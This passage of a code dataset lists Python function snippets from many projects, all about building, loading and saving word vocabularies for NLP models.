tokens = tokenizer(line) if tokenizer else basic_tokenizer(line)\n for w in tokens:\n word = re.sub(_DIGIT_RE, \"0\", w) if normalize_digits else w\n if word in vocab:\n vocab[word] += 1\n else:\n vocab[word] = 1\n sorted_vocab = sorted(vocab, key=vocab.get, reverse=True)\n vocab_list = _START_VOCAB + sorted_vocab\n if len(vocab_list) > max_vocabulary_size:\n vocab_list = vocab_list[:max_vocabulary_size]\n print(\"Corpus %s has %d tokens, %d uniq words, %d vocab at cutoff %d.\" % (\n data_path, sum(vocab.values()), len(vocab), max_vocabulary_size, vocab[sorted_vocab[max_vocabulary_size - len(_START_VOCAB)]] ) )\n else:\n print(\"Corpus %s has %d tokens, %d uniq words, %d vocab at cutoff %d.\" % (\n data_path, sum(vocab.values()), len(vocab), len(vocab), 0))\n\n with gfile.GFile(vocabulary_path, mode=\"wb\") as vocab_file:\n for w in vocab_list:\n vocab_file.write(w + \"\\n\")", "def build_vocab(self):\n if self.test_file is None:\n print('test_file is None')\n file_list = [self.train_file, self.dev_file]\n else:\n file_list = [self.train_file, self.dev_file, self.test_file]\n\n examples = []\n for file_name in file_list:\n examples += ParseExample.load_data(file_name)\n\n sents = []\n for example in examples:\n warrant0, warrant1, reason, claim, debate_meta_data, negclaim = example.get_six(type=WORD_TYPE)\n sents.append(warrant0)\n sents.append(warrant1)\n sents.append(reason)\n sents.append(claim)\n sents.append(debate_meta_data)\n\n vocab = data_utils.build_word_vocab(sents)\n\n return vocab", "def from_pickle(pkl):\n assert os.path.exists(pkl), f\"{pkl} not exists\"\n with open(pkl, 'rb') as f:\n vocab = pickle.load(f)\n \n return vocab", "def get_vocab(self):\n if os.path.exists(self.vocab_file) & self.vocab_from_file:\n f = open(self.vocab_file, \"rb\")\n vocab = pickle.load(f)\n self.word2idx = vocab.word2idx\n self.idx2word = vocab.idx2word\n f.close()\n else:\n self.build_vocab()\n with open(self.vocab_file, 'wb') as f:\n pickle.dump(self, f)", "def __init__(self, file):\n with open(file, 'r') as f:\n self.vocab = json.loads(f.read())", "def vocab(self) -> Vocabulary:\n return self._model.vocab", "def initialize_vocabulary(self,vocabulary_path):\n if tf.gfile.Exists(vocabulary_path):\n vocab = corpora.Dictionary.load(vocabulary_path)\n print(\"vocab length: \",len(vocab.token2id))\n\n return vocab.token2id, vocab.token2id.keys()\n else:\n raise ValueError(\"Vocabulary file %s not found.\", vocabulary_path)", "def create_vocab_table(db, vocab):\n con = lite.connect(db)\n with con:\n cur = con.cursor()\n cur.execute(\"CREATE TABLE IF NOT EXISTS Vocab(vocab TEXT)\")\n for i in range(0, len(vocab)):\n vocab[i] = (vocab[i],)\n with con:\n cur = con.cursor()\n cur.executemany(\"INSERT INTO Vocab VALUES (?)\", vocab)", "def load_vocab(path: str) -> Vocab:\n return torch.load(path, map_location=lambda storage, loc: storage)['args'].vocab", "def buildVocabulary(paragraphs, verbose=True):\n vocabulary = []\n \n for p in paragraphs:\n for word in p.split():\n vocabulary.append(word)\n\n vocabulary = set(vocabulary)\n if verbose:\n print('Built vocabulary of %d unique words'%len(vocabulary))\n \n return list(vocabulary)", "def load_vocab(self, fn):\n vocab = load_vocab(fn)\n self.vocab = vocab\n self.has_vocab = True", "def get_vocab(self):\n\n\t\tself.parse_transcript() \n\t\tself.purge_words()\n\t\tself.analyze_words()\n\t\tself.sort_word_analysis()", "def _build_vocabulary(input_files):\n if FLAGS.vocab_file:\n tf.logging.info(\"Loading existing vocab file.\")\n vocab = collections.OrderedDict()\n with tf.gfile.GFile(FLAGS.vocab_file, mode=\"r\") as f:\n for i, line in enumerate(f):\n word = line.decode(\"utf-8\").strip()\n assert word not in vocab, \"Attempting to add word twice: %s\" % word\n vocab[word] = i\n tf.logging.info(\"Read vocab of size %d from %s\",\n len(vocab), FLAGS.vocab_file)\n return vocab\n\n tf.logging.info(\"Creating vocabulary.\")\n num = 0\n wordcount = collections.Counter()\n for input_file in input_files:\n tf.logging.info(\"Processing file: %s\", input_file)\n for sentence in tf.gfile.FastGFile(input_file):\n wordcount.update(sentence.split())\n\n num += 1\n if num % 1000000 == 0:\n tf.logging.info(\"Processed %d sentences\", num)\n\n tf.logging.info(\"Processed %d sentences total\", num)\n\n words = wordcount.keys()\n freqs = wordcount.values()\n sorted_indices = np.argsort(freqs)[::-1]\n\n vocab = collections.OrderedDict()\n vocab[special_words.EOS] = special_words.EOS_ID\n vocab[special_words.UNK] = special_words.UNK_ID\n for w_id, w_index in enumerate(sorted_indices[0:FLAGS.num_words - 2]):\n vocab[words[w_index]] = w_id + 2 # 0: EOS, 1: UNK.\n\n tf.logging.info(\"Created vocab with %d words\", len(vocab))\n\n vocab_file = os.path.join(FLAGS.output_dir, \"vocab.txt\")\n with tf.gfile.FastGFile(vocab_file, \"w\") as f:\n f.write(\"\\n\".join(vocab.keys()))\n tf.logging.info(\"Wrote vocab file to %s\", vocab_file)\n\n word_counts_file = os.path.join(FLAGS.output_dir, \"word_counts.txt\")\n with tf.gfile.FastGFile(word_counts_file, \"w\") as f:\n for i in sorted_indices:\n f.write(\"%s %d\\n\" % (words[i], freqs[i]))\n tf.logging.info(\"Wrote word counts file to %s\", word_counts_file)\n\n return vocab", "def trackVocabulary(context):\n ct = getToolByName(context,'portal_catalog')\n tracks = ct.searchResults(portal_type='apyb.papers.track', sort_on='getObjPositionInParent')\n items = [SimpleTerm(b.UID,b.UID,b.Title) for b in tracks]\n return SimpleVocabulary(items)", "def build_vocabulary(self):\n \n for iCount in range(0,len(self.documents)):\n for jCount in range(iCount,len(self.documents[iCount])):\n self.vocabulary.append(self.documents[iCount][jCount])\n\n self.vocabulary = set(self.vocabulary)\n\t\t\n self.vocabulary = sorted(self.vocabulary)\n\t\t#print(\"Value of the vocabulary\")\n self.vocabulary_size = len(self.vocabulary)", "def build_vocab(sentences_list, vocab_size, visual_fld):\n words = [word for sentence in sentences_list for word in sentence]\n utils.safe_mkdir(visual_fld)\n with open(os.path.join(visual_fld, 'vocab.tsv'), 'w') as fd:\n dictionary = {}\n index_dictionary = {}\n count = [('UNK', -1)]\n count.extend(Counter(words).most_common(vocab_size - 1))\n for index, (word, _) in enumerate(count):\n dictionary[word] = index\n index_dictionary[index] = word\n fd.write(word + '\\n')\n\n return dictionary, index_dictionary", "def load_vocab():\n # vocab loaded internally at google\n unused = r.sp_model\n del unused\n return r", "def _make_vocab_files(self):\n self.logger.info('making question vocab...' + self.opt.QUESTION_VOCAB_SPACE)\n qdic, _ = self.load_data(self.opt.QUESTION_VOCAB_SPACE)\n question_vocab = VQADataProvider.make_question_vocab(qdic, self.max_length)\n self.logger.info('making answer vocab...' + self.opt.ANSWER_VOCAB_SPACE)\n qdic, adic = self.load_data(self.opt.ANSWER_VOCAB_SPACE)\n answer_vocab = VQADataProvider.make_answer_vocab(adic, qdic, self.opt.MAX_ANSWER_VOCAB_SIZE, self.use_ocr)\n return question_vocab, answer_vocab", "def setVocabulary(self, vocabulary): # real signature unknown; restored from __doc__\n pass", "def create_vocabulary(\n data: Series,\n tokenizer_type: str = \"space\",\n lowercase: bool = True,\n num_most_frequent: int = None,\n vocab_file: str = None,\n add_special_symbols: bool = True,\n unknown_symbol: str = UNKNOWN_SYMBOL,\n padding_symbol: str = PADDING_SYMBOL,\n start_symbol: str = START_SYMBOL,\n stop_symbol: str = STOP_SYMBOL,\n pretrained_model_name_or_path: str = None,\n ngram_size: Optional[int] = None,\n compute_idf: bool = False,\n processor: DataFrameEngine = PANDAS,\n) -> Vocabulary:\n vocab = None\n\n tokenizer = get_tokenizer_from_registry(tokenizer_type)(\n vocab_file=vocab_file,\n pretrained_model_name_or_path=pretrained_model_name_or_path,\n ngram_size=ngram_size,\n )\n\n # Pre-trained huggingface tokenizer. Use the pre-existing vocabulary and special symbols.\n if tokenizer_type == \"hf_tokenizer\":\n try:\n vocab = tokenizer.get_vocab()\n vocab = list(vocab.keys())\n except NotImplementedError:\n logger.warning(\n \"HuggingFace tokenizer does not have a get_vocab() method. \"\n + \"Using tokenizer.tokenizer.vocab_size and tokenizer.tokenizer._convert_id_to_token \"\n + \"to build the vocabulary.\"\n )\n vocab = []\n for idx in range(tokenizer.tokenizer.vocab_size):\n vocab.append(tokenizer.tokenizer._convert_id_to_token(idx))\n vocab += tokenizer.tokenizer.added_tokens_encoder.keys()\n\n pad_token = tokenizer.get_pad_token()\n unk_token = tokenizer.get_unk_token()\n\n if unk_token is None:\n logger.warning(\n \"No unknown token found in HuggingFace tokenizer. Adding one. \"\n + \"NOTE: This will change the vocabulary size and may affect model \"\n + \"performance, particularly if the model weights are frozen.\"\n )\n vocab = [unknown_symbol] + vocab\n else:\n unknown_symbol = unk_token\n\n if pad_token is None and add_special_symbols:\n logger.warning(\n \"No padding token found in HuggingFace tokenizer. Adding one. \"\n + \"NOTE: This will change the vocabulary size and may affect model \"\n + \"performance, particularly if the model weights are frozen.\"\n )\n vocab = [padding_symbol] + vocab\n else:\n padding_symbol = pad_token\n elif hasattr(tokenizer, \"get_vocab\"):\n vocab = tokenizer.get_vocab()\n vocab = list(vocab.keys())\n elif vocab_file is not None:\n vocab = load_vocabulary(vocab_file)\n\n def process_line(line):\n return tokenizer(line.lower() if lowercase else line)\n\n processed_lines = processor.map_objects(data, process_line)\n processed_counts = processed_lines.explode().value_counts(sort=False)\n processed_counts = processor.compute(processed_counts)\n unit_counts = Counter(dict(processed_counts))\n\n doc_unit_counts = None\n if compute_idf:\n # The document frequency used for TF-IDF. Similar to unit_counts, but de-duped by document.\n document_counts = processed_lines.map(lambda x: set(x)).explode().value_counts(sort=False)\n document_counts = processor.compute(document_counts)\n doc_unit_counts = Counter(dict(document_counts))\n\n line_length_max = processor.compute(processed_lines.map(len).max())\n line_length_99ptile = processor.compute(processed_lines.map(len).quantile(0.99))\n\n if vocab is None:\n vocab = [unit for unit, _ in unit_counts.most_common(num_most_frequent)]\n\n vocab_set = set(vocab)\n\n if tokenizer_type != \"hf_tokenizer\":\n if add_special_symbols:\n add_or_move_symbol(vocab, vocab_set, stop_symbol, SpecialSymbol.STOP.value)\n add_or_move_symbol(vocab, vocab_set, start_symbol, SpecialSymbol.START.value)\n add_or_move_symbol(vocab, vocab_set, padding_symbol, SpecialSymbol.PADDING.value)\n # Always add the UNKNOWN symbol if we're using our own tokenizer.\n add_or_move_symbol(vocab, vocab_set, unknown_symbol, SpecialSymbol.UNKNOWN.value)\n\n str2idx = {unit: i for i, unit in enumerate(vocab)}\n str2freq = {unit: unit_counts.get(unit) if unit in unit_counts else 0 for unit in vocab}\n str2idf = (\n {unit: np.log(len(vocab) / (1 + doc_unit_counts.get(unit))) if unit in doc_unit_counts else 0 for unit in vocab}\n if compute_idf\n else None\n )\n\n pad_idx = None\n if padding_symbol in str2idx.keys():\n pad_idx = str2idx[padding_symbol]\n\n return Vocabulary(\n vocab=vocab,\n str2idx=str2idx,\n str2freq=str2freq,\n str2idf=str2idf,\n line_length_max=line_length_max,\n line_length_99ptile=line_length_99ptile,\n pad_idx=pad_idx,\n padding_symbol=padding_symbol,\n unknown_symbol=unknown_symbol,\n )", "def build_vocab(sentences):\n # Build vocabulary\n word_counts = Counter(itertools.chain(*sentences)) # 实际没用到\n # Mapping from index to word\n vocabulary_inv = [x[0] for x in word_counts.most_common()]\n vocabulary_inv = list(sorted(vocabulary_inv))\n # 加入 <UNK>\n vocabulary_inv.insert(0, '</s>')\n # Mapping from word to index\n vocabulary = {x: i for i, x in enumerate(vocabulary_inv)}\n return [vocabulary, vocabulary_inv]", "def GetVocab(self, request, context):\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')", "def build_vocabulary(self, tokens=None, embeddings=None):\n if tokens is not None and embeddings is not None:\n raise ValueError(\"Only accepts either `tokens` or `embeddings`.\")\n\n if tokens is not None:\n # Build from tokenized tokens\n # for sentence in tqdm(tokens):\n # for word in tokens:\n # print(type(word))\n # exit()\n self.vocab.extend(\n list(set([\n word\n for sentence in tqdm(tokens)\n for word in sentence\n ]))\n )\n elif embeddings is not None:\n # Build from pretrained embeddings\n for word in tqdm(embeddings):\n word = word.strip(\"\\n\")\n word = word.split(\" \")\n\n self.vocab.append(word[0])\n vector = word[1:]\n self.vectors.append(vector)", "def __init__(self, vocabulary, max_completions=5):\n self._vocabulary = vocabulary\n self._max_completions = max_completions", "def vocab_from_json(path: str) -> Dict:\n with open(path, encoding=VOCAB_ENCODING) as inp:\n vocab = json.load(inp)\n logger.info('Vocabulary (%d words) loaded from \"%s\"', len(vocab), path)\n return vocab", "def _insert_vocab(self, json_obj, mode=InsertVocabMode.ALL):\n raise NotImplementedError", "def create_vocab():\n \n cutoff = CUTOFF\n \n lines = open(INFNAME_FORMAT.format(\"train\")).readlines() \\\n + open(INFNAME_FORMAT.format(\"test\")).readlines()\n raw = [process_line(l) for l in lines]\n cntx = Counter( [ w for e in raw for w in e ] )\n vocab = { x for x, y in cntx.items() if y > cutoff }\n \n return vocab", "def load_vocabulary():\n global vocabulary_list, vocabulary_dict\n vocabulary_list = []\n vocabulary_dict = {}\n\n with open(_VOCABULARY_PATH, 'r') as f:\n for index, line in enumerate(f):\n line = line.strip()\n vocabulary_dict[line] = index\n vocabulary_list.append(line)", "def build_vocab(cleaned_captions):\n # QUESTION 1.1\n # Here we Build a vocabulary\n\n # create a vocab instance\n vocab = Vocabulary()\n\n words = dict()\n for caption in cleaned_captions: # iterate through all cleaned_caption\n for word in caption.split(): # iterate over all words in a caption\n # add the token words to vocabulary if and only if the count of word is more than MIN_FREQUENCY i.e. 3\n if word not in words.keys():\n words[word] = 1\n else:\n words[word] += 1\n if words[word] > MIN_FREQUENCY:\n vocab.add_word(word)\n\n vocab.add_word('<pad>')\n vocab.add_word('<start>')\n vocab.add_word('<end>')\n vocab.add_word('<unk>')\n\n print(vocab.idx)\n\n return vocab", "def create(cls, dictionary):\n return cls(**dictionary)", "def create(cls, dictionary):\n return cls(**dictionary)", "def build_vocab(sentences, saved_vocabulary_inv):\n if saved_vocabulary_inv:\n vocabulary_inv = saved_vocabulary_inv\n else:\n # Build vocabulary\n word_counts = Counter(itertools.chain(*sentences))\n # Mapping from index to word\n vocabulary_inv = [x[0] for x in word_counts.most_common()]\n # Mapping from word to index\n vocabulary = {x: i for i, x in enumerate(vocabulary_inv)}\n return [vocabulary, vocabulary_inv]", "def build_vocab(sentences):\n # Build vocabulary\n word_counts = Counter(itertools.chain(*sentences))\n # Mapping from index to word\n vocabulary_inv = [x[0] for x in word_counts.most_common()]\n vocabulary_inv.append('<pad>')\n vocabulary_inv = list(sorted(vocabulary_inv))\n # Mapping from word to index\n vocabulary = {x: i for i, x in enumerate(vocabulary_inv)}\n return [vocabulary, vocabulary_inv]", "def trainingsVocabulary(context):\n ct = getToolByName(context,'portal_catalog')\n dictSearch = {'portal_type':'apyb.papers.training',\n 'sort_on':'sortable_title',\n 'review_state':'confirmed'}\n trainings = ct.searchResults(**dictSearch)\n trainings = [SimpleTerm(b.UID,b.UID,b.Title) for b in trainings]\n return SimpleVocabulary(trainings)", "def build_vocab(sentences):\n # Build vocabulary\n word_counts = Counter(itertools.chain(*sentences))\n # Mapping from index to word\n vocabulary_inv = [x[0] for x in word_counts.most_common()]\n vocabulary_inv = list(sorted(vocabulary_inv))\n # Mapping from word to index\n vocabulary = {x: i for i, x in enumerate(vocabulary_inv)}\n return [vocabulary, vocabulary_inv]", "def generate_vocabulary():\n stop_words = load_stop_words()\n words = ' '.join(generate_corpus()).split()\n print(len(words))\n vocabulary = {}\n for word in words:\n if word in stop_words:\n continue\n if word in vocabulary.keys():\n vocabulary[word] += 1\n else:\n vocabulary[word] = 1\n vocabulary = dict(sorted(vocabulary.items(), key=lambda x: x[1], reverse=True))\n return vocabulary", "def speakersVocabulary(context):\n ct = getToolByName(context,'portal_catalog')\n dictSearch = {'portal_type':'apyb.papers.speaker','sort_on':'sortable_title'}\n speakers = ct.searchResults(**dictSearch)\n speakers = [SimpleTerm(b.UID,b.UID,b.Title) for b in speakers]\n return SimpleVocabulary(speakers)", "def build_vocab(sentences):\n # Build vocabulary\n word_counts = Counter(itertools.chain(*sentences))\n # Mapping from index to word\n vocabulary_inv = [x[0] for x in word_counts.most_common()]\n # Mapping from word to index\n vocabulary = {x: i for i, x in enumerate(vocabulary_inv)}\n return [vocabulary, vocabulary_inv]", "def build_vocab(sentences):\n # Build vocabulary\n word_counts = Counter(itertools.chain(*sentences))\n # Mapping from index to word\n vocabulary_inv = [x[0] for x in word_counts.most_common()]\n # Mapping from word to index\n vocabulary = {x: i for i, x in enumerate(vocabulary_inv)}\n return [vocabulary, vocabulary_inv]", "def build_vocab(sentences):\n # Build vocabulary\n word_counts = Counter(itertools.chain(*sentences))\n # Mapping from index to word\n vocabulary_inv = [x[0] for x in word_counts.most_common()]\n # Mapping from word to index\n vocabulary = {x: i for i, x in enumerate(vocabulary_inv)}\n return [vocabulary, vocabulary_inv]", "def build_vocab(sentences):\n # Build vocabulary\n word_counts = Counter(itertools.chain(*sentences))\n # Mapping from index to word\n vocabulary_inv = [x[0] for x in word_counts.most_common() if x[1] > 1]\n vocabulary_inv += ['$']\n vocabulary_inv = list(sorted(vocabulary_inv))\n # Mapping from word to index\n vocabulary = {x: i for i, x in enumerate(vocabulary_inv)}\n return [vocabulary, vocabulary_inv]", "def process_vocabulary(args, data, quiet=False):\n if not quiet:\n out(args.logfile, \"initializing vacabularies... \", end=\"\")\n seq_vocab = vocabulary.Vocabulary()\n bracket_vocab = vocabulary.Vocabulary()\n # loop_type_vocab = vocabulary.Vocabulary()\n\n for vocab in [seq_vocab, bracket_vocab]: # , loop_type_vocab]:\n vocab.index(START)\n vocab.index(STOP)\n for x in data[:100]:\n seq = x[\"sequence\"]\n dot = x[\"structure\"]\n # loop = x[\"predicted_loop_type\"]\n for character in seq:\n seq_vocab.index(character)\n for character in dot:\n bracket_vocab.index(character)\n # for character in loop:\n # loop_type_vocab.index(character)\n for vocab in [seq_vocab, bracket_vocab]: # , loop_type_vocab]:\n # vocab.index(UNK)\n vocab.freeze()\n if not quiet:\n out(args.logfile, \"done.\")\n\n def print_vocabulary(name, vocab):\n # special = {START, STOP, UNK}\n special = {START, STOP}\n out(args.logfile, \"{}({:,}): {}\".format(\n name, vocab.size,\n sorted(value for value in vocab.values if value in special) +\n sorted(value for value in vocab.values if value not in special)))\n\n if not quiet:\n print_vocabulary(\"Sequence\", seq_vocab)\n print_vocabulary(\"Brackets\", bracket_vocab)\n return seq_vocab, bracket_vocab", "def make_vocab(src_hparams, tgt_hparams):\n src_vocab = MonoTextData.make_vocab(src_hparams)\n\n if tgt_hparams[\"processing_share\"]:\n tgt_bos_token = src_hparams[\"bos_token\"]\n tgt_eos_token = src_hparams[\"eos_token\"]\n else:\n tgt_bos_token = tgt_hparams[\"bos_token\"]\n tgt_eos_token = tgt_hparams[\"eos_token\"]\n tgt_bos_token = utils.default_str(tgt_bos_token,\n SpecialTokens.BOS)\n tgt_eos_token = utils.default_str(tgt_eos_token,\n SpecialTokens.EOS)\n if tgt_hparams[\"vocab_share\"]:\n if tgt_bos_token == src_vocab.bos_token and \\\n tgt_eos_token == src_vocab.eos_token:\n tgt_vocab = src_vocab\n else:\n tgt_vocab = Vocab(src_hparams[\"vocab_file\"],\n bos_token=tgt_bos_token,\n eos_token=tgt_eos_token)\n else:\n tgt_vocab = Vocab(tgt_hparams[\"vocab_file\"],\n bos_token=tgt_bos_token,\n eos_token=tgt_eos_token)\n\n return src_vocab, tgt_vocab", "def vocab_from_pickle(path: str) -> Dict:\n with open(path, \"rb\") as inp:\n vocab = pickle.load(inp)\n logger.info('Vocabulary (%d words) loaded from \"%s\"', len(vocab), path)\n return vocab", "def build_vocab(words, vocab_size, visual_fld=None):\n utils.safe_mkdir(visual_fld)\n file = open(os.path.join(visual_fld, 'vocab.tsv'), 'w',encoding='utf8')\n\n dictionary = dict()\n count = [('UNK', -1)]\n index = 0\n count.extend(Counter(words).most_common(vocab_size - 1))\n\n for word, _ in count:\n dictionary[word] = index\n index += 1\n file.write(word + '\\n')\n\n index_dictionary = dict(zip(dictionary.values(), dictionary.keys()))\n file.close()\n return dictionary, index_dictionary", "def load_vocab(vocab: Union[str, Vocab]) -> Vocab:\n if isinstance(vocab, Vocab):\n return vocab\n elif isinstance(vocab, str):\n return Vocab.load(vocab)\n else:\n raise NotImplementedError('Type of the input vocab is not supported. '\n 'We only support \"str\" or \"Vocab\". type(vocab) = \"{}\".'\n .format(type(vocab)))", "def create_bpe_vocabulary(bpe_vocab_fp, bpe_int_fp, data_path, truecaser_fp):\n bpe = BPE(glossaries=SPECIAL_TOKENS)\n bpe.load(bpcodes_fp=bpe_int_fp, merges=-1)\n\n tcaser = MosesTruecaser(load_from=truecaser_fp, is_asr=True)\n tcase_func = partial(tcaser.truecase, return_str=True, use_known=True)\n unsup_tok_func = lambda x: bpe.tokenize(tcase_func(x).split())\n\n # PIPELINES AND VOCAB #\n\n vocab_pipeline = assemble_vocab_pipeline(text_fname=InpDataF.REV_TEXT,\n lowercase=False,\n tok_func=unsup_tok_func)\n subword_vocab = Vocabulary(vocab_pipeline, name_prefix=\"word\",\n special_tokens=SPECIAL_TOKENS)\n subword_vocab.create(data_source={\"data_path\": data_path}, max_size=None,\n data_fnames=InpDataF.REV_TEXT)\n subword_vocab.write(bpe_vocab_fp, sep=' ')", "def __init__(self):\n self.sess = tf.Session()\n vocab_path = os.path.join(params.data_dir, \"vocab%d\" % params.vocab_size)\n self.vocab, self.rev_vocab = data_utils.initialize_vocabulary(vocab_path)\n self.model = model_utils.create_model(self.sess, True)\n self.model.batch_size = 1 # Respond 1 sentence at a time.", "def get_vocab(which_vocab):\n path = os.path.join(mg.WORKING_PATH, 'vocab', ''.join([which_vocab, '.json'\n ]))\n if os.path.exists(path):\n with open(path, 'r') as js:\n return(json.load(js))\n else:\n return(dict())", "def ensure_vocabulary(name):\n vocab = read_vocabulary_by_name(name)\n if vocab is None:\n return create_vocabulary(name)\n return vocab['id']", "def make_corpus(self, t, v=None):\n v = self.vectorizer\n\n try:\n corpus = v.transform(t)\n except ValueError, e:\n return None, None\n \n vocab = {y:x for x,y in v.vocabulary_.iteritems()}\n corpus = gensim.matutils.Sparse2Corpus(corpus, documents_columns=False)\n return corpus, vocab", "def load_vocabulary(self):\n vocab_file = open(vocabulary_path, \"r\")\n self.vocab_list = vocab_file.read().split(\"\\n\")\n vocab_file.close()\n print(\"[INFO] Reading vocabulary...\")\n print(self.vocab_list[0:15])", "def build_vocab(data):\n # data = _read_words(filename)\n counter = collections.Counter(data)\n # print('counter', counter) # dictionary for the occurrence number of each word, e.g. 'banknote': 1, 'photography': 1, 'kia': 1\n count_pairs = sorted(counter.items(), key=lambda x: (-x[1], x[0]))\n # print('count_pairs',count_pairs) # convert dictionary to list of tuple, e.g. ('ssangyong', 1), ('swapo', 1), ('wachter', 1)\n words, _ = list(zip(*count_pairs))\n word_to_id = dict(zip(words, range(len(words))))\n # print(words) # list of words\n # print(word_to_id) # dictionary for word to id, e.g. 'campbell': 2587, 'atlantic': 2247, 'aoun': 6746\n return word_to_id", "def create_vocabs(self):\r\n print('Creating vocabs...')\r\n\r\n # Update surface_char2id\r\n unique_surfaces = set(chain(*[sentence.surface_words for sentence in self.sentences]))\r\n unique_chars = set(chain(*[surface for surface in unique_surfaces]))\r\n for ch in unique_chars:\r\n self.surface_char2id[ch] = len(self.surface_char2id)\r\n\r\n # Update lemma_char2id\r\n unique_lemmas = set(chain(*[sentence.lemmas for sentence in self.sentences]))\r\n unique_chars = set(chain(*[lemma for lemma in unique_lemmas]))\r\n for ch in unique_chars:\r\n self.lemma_char2id[ch] = len(self.lemma_char2id)\r\n\r\n # Update transformation2id\r\n for sentence in self.sentences:\r\n for transformation in sentence.transformations:\r\n for _t in transformation:\r\n if _t not in self.transformation2id:\r\n self.transformation2id[_t] = len(self.transformation2id)\r\n\r\n # Update morph_tag2id\r\n unique_morph_tags = list(chain(*[sentence.morph_tags for sentence in self.sentences]))\r\n unique_tags = set(chain(*[morph_tag for morph_tag in unique_morph_tags]))\r\n for tag in unique_tags:\r\n self.morph_tag2id[tag] = len(self.morph_tag2id)\r\n print('Surface Chars={}, Lemma Chars={}, Transformations={}, tags={}'.format(\r\n len(self.surface_char2id), len(self.lemma_char2id), len(self.transformation2id), len(self.morph_tag2id)\r\n ))", "def create_choice(question, choice_text, votes=0):\n return question.choice_set.create(choice_text=choice_text, votes=votes)", "def _init_vocab(self):\n self._word2idx = {}\n self._idx2word = {}\n self.freqs = {}\n self.vocab_size = 0\n\n self._add_word(self.pad_word)\n self._add_word(self.start_word)\n self._add_word(self.end_word)\n self._add_word(self.unk_word)\n\n self.start_word_idx = self.stoi(self.start_word)\n self.end_word_idx = self.stoi(self.end_word)\n self.unk_word_idx = self.stoi(self.unk_word)\n self.pad_word_idx = self.stoi(self.pad_word)\n\n self._special_tokens = {\n 'bos_token': self.start_word,\n 'cls_token': self.start_word,\n 'eos_token': self.end_word,\n 'sep_token': self.end_word,\n 'pad_token': self.pad_word,\n 'unk_token': self.unk_word,\n }\n\n self._special_ids = {\n 'bos_token_id': self.start_word_idx,\n 'cls_token_id': self.start_word_idx,\n 'eos_token_id': self.end_word_idx,\n 'sep_token_id': self.end_word_idx,\n 'pad_token_id': self.pad_word_idx,\n 'unk_token_id': self.unk_word_idx,\n }\n\n self.cls_token_id = self.bos_token_id = self.start_word_idx\n self.eos_token_id = self.sep_token_id = self.end_word_idx\n self.pad_token_id = self.pad_word_idx\n self.unk_token_id = self.unk_word_idx\n\n self.cls_token = self.bos_token = self.start_word\n self.eos_token = self.sep_token = self.end_word\n self.pad_token = self.pad_word\n self.unk_token = self.unk_word", "def __repr__(self):\n l1 = \", \".join(\"{}={}\".format(x,y) for x,y in self._loading_params.items())\n l2 = \"max_vocab_size={}, min_token_freq={}, max_token_freq={}, ngrams={}\".format(\n self._max_vocab_size if hasattr(self, \"_max_vocab_size\") else None,\n self._min_token_freq if hasattr(self, \"_min_token_freq\") else 0,\n self._max_token_freq if hasattr(self, \"_max_token_freq\") else None,\n self._ngrams if hasattr(self, \"_ngrams\") else [1,1]\n )\n desc = \"Vocabulary({}, {})\".format(l1, l2)\n return desc", "def __init__(\n self, values: Set, name: str, namespace: Optional[str] = None,\n label: Optional[str] = None, description: Optional[str] = None\n ):\n super(VocabularyHandle, self).__init__(\n name=name,\n namespace=namespace,\n label=label,\n description=description\n )\n self.values = values", "def save_vocabulary(path, vocab):\n print('saving vocabulary..')\n with open(path, 'wb') as handle:\n pickle.dump(vocab, handle, protocol=pickle.HIGHEST_PROTOCOL)\n print('vocabulary was saved successfully!')", "def create_vocab(vocab_size):\n vocab_dict = tff.simulation.datasets.stackoverflow.load_word_counts(\n cache_dir='/tmp')\n return list(vocab_dict.keys())[:vocab_size]", "def build_vocab(path, fname):\r\n\twords = open(path, 'r', encoding='utf-8').read().split()\r\n\twordCount = Counter(words)\r\n\tif not os.path.exists(pm.vocab_path):\r\n\t\tos.makedirs(pm.vocab_path)\r\n\twith open(pm.vocab_path + fname, 'w', encoding='utf-8') as f:\r\n\t\tf.write(\"{}\\t1000000000\\n{}\\t1000000000\\n{}\\t1000000000\\n{}\\t1000000000\\n\".format(\"<PAD>\", \"<UNK>\", \"<SOS>\", \"<EOS>\"))\r\n\t\tfor word, count in wordCount.most_common(len(wordCount)):\r\n\t\t\tf.write(u\"{}\\t{}\\n\".format(word, count))", "def generate_vocab():\n\n vocab_dict = {}\n folder_path = os.listdir(args.f)\n for subfolder in folder_path:\n subfolder_path = os.path.join(args.f, subfolder)\n for filename in os.listdir(subfolder_path):\n with open(os.path.join(subfolder_path, filename), 'r') as file:\n read_file = file.read()\n normalised_text = re.sub(r\"[^\\s\\w]\", \" \", read_file.lower())\n vocab = normalised_text.split() #.split() creates a list of strings\n vocab_dict.update({i: 0 for i in vocab})\n return vocab_dict", "def load_vocab(path, encoding=\"UTF-9\"):\n vocab = []\n\n if not os.path.exists(path):\n return vocab\n\n with open(path, encoding=encoding) as fin:\n for line in fin.readlines():\n line = line.strip()\n word, freq = line.split(\"\\t\")\n vocab.append((word,int(freq)))\n\n return vocab", "def build_vocab(self, sentences, keep_raw_vocab=False, trim_rule=None, progress_per=10000, update=False):\n print(\"build------------------\")\n self.scan_vocab(sentences, progress_per=progress_per, trim_rule=trim_rule) # initial survey\n # trim by min_count & precalculate downsampling\n self.scale_vocab(trim_rule=trim_rule, update=update)\n self.finalize_vocab(update=update)", "def from_dataset(cls, dataset, col_names, vocab_size, character_coverage, model_type, params):\n\n vocab = SentencePieceVocab()\n root = copy.deepcopy(dataset).build_sentencepiece_vocab(vocab, col_names, vocab_size, character_coverage,\n model_type, params)\n for d in root.create_dict_iterator(num_epochs=1):\n if d is None:\n raise ValueError(\"from_dataset should receive data other than None.\")\n return vocab", "def get_vocabulary(self, vocid, lang=None):\n\n payload = {}\n if lang is not None:\n payload['lang'] = lang\n req = requests.get(self.api_base + vocid + '/', params=payload)\n if req.status_code == 404:\n raise ValueError(req.text)\n req.raise_for_status()\n return req.json()", "def list(self, request, format=None):\n queryset = Vocab.objects.all()\n serializer = VocabSerializer(queryset, context={\"request\": request})\n return Response(serializer.data)", "def build_vocab(captions, threshold=0):\n\n\tcounter = Counter()\n\tfor caption in captions:\n\t\ttokens = caption.lower().split('/') \n\t\tcounter.update(tokens)\n\n\n\t# If the word frequency is less than 'threshold', then the word is discarded.\n\twords = [word for word, cnt in counter.items() if cnt >= threshold]\n\t# Creates a vocab wrapper and add some special tokens.\n\tvocab = 